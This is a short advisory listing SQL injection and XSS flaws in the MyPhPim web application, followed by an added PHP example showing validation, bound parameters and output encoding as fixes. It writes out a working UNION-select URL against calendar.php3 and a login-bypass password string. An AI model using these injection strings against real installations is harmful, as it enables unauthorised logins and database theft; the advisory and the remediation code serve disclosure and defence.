PoC/Exploit for Multiple SQL Injection and XSS in MyPhPim

Published Proof of Concept code - Multiple SQL Injection and XSS in MyPhPim.

Description: Available
Solution: Not available - check vendor's website

SQL Injection Examples:

URL: http://host/myphpim/calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Login page:
login: [first registered user]
pass: a") or "a"="a"/*

Cross-Site Scripting Example:

Create New todo For [user] Page:
Description value: <XSS>
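
With no vendor fix listed, the three inputs above (cal_id, the login password, the todo description) each need handling in the application code. The following is an added example, not MyPhPim source and not a vendor or eVuln patch: the schema, function names and in-memory SQLite database are assumptions used to show integer validation, bound parameters and output encoding in current PHP.

```php
<?php
declare(strict_types=1);
// Added example, not MyPhPim source. Schema, function names and sample rows are
// hypothetical; in-memory SQLite stands in for the application's database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (login TEXT PRIMARY KEY, pass_hash TEXT)');
$db->exec('CREATE TABLE calendar (cal_id INTEGER PRIMARY KEY, title TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO calendar VALUES (1, 'Team meeting')");

// cal_id: accept only a positive integer, then bind it; never concatenate.
function calendarDetail(PDO $db, string $rawCalId): ?array
{
    $id = filter_var($rawCalId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a plain integer is rejected
    }
    $st = $db->prepare('SELECT cal_id, title FROM calendar WHERE cal_id = ?');
    $st->execute([$id]);
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Login: look the user up with a bound parameter and verify the hash in PHP,
// so the submitted password never becomes part of the SQL text.
function checkLogin(PDO $db, string $login, string $pass): bool
{
    $st = $db->prepare('SELECT pass_hash FROM users WHERE login = ?');
    $st->execute([$login]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Todo description: store as entered, encode at the point it is written to HTML.
function renderDescription(string $description): string
{
    return htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs modelled on the strings listed in this advisory.
var_dump(calendarDetail($db, '1'));                        // well-formed id
var_dump(calendarDetail($db, '999 union select 1,2,3/*')); // shortened UNION string
var_dump(checkLogin($db, 'alice', 'a") or "a"="a"/*'));    // login string from above
var_dump(checkLogin($db, 'alice', 'correct horse'));       // genuine password
echo renderDescription('<XSS>'), "\n";                     // description placeholder
```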
